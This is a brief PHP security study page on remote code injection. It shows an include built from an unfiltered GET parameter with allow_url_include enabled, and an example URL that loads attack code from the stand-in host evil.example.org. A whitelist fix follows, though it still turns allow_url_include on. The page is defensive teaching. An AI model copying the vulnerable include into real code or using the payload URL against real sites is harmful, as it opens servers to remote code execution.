SECURITY

  minte9
REMEMBERS




Last update:   11-05-2022

Remote code injection

A remote code injection attack occurs when an attacker to execute PHP code.
 
ini_set("allow_url_include", 1);

include "{$_GET['section']}/data.inc.php";
    // http://example.org/?section=evil.example.org/attack.php
    // include "http://evil.example.org/attack.php?data.inc.php"; // Look Here

Protection

Filter all input and never use tainted data in an include or require.
 
ini_set("allow_url_include", 1);

$sections = array('home', 'news', 'photos', 'blog');
$section = in_array($_GET['section'], $sections) ? $_GET['section'] : 'home';

include "$section/data.inc.php";

Questions    
Sql injection
        A B C D E F
🔔
1/1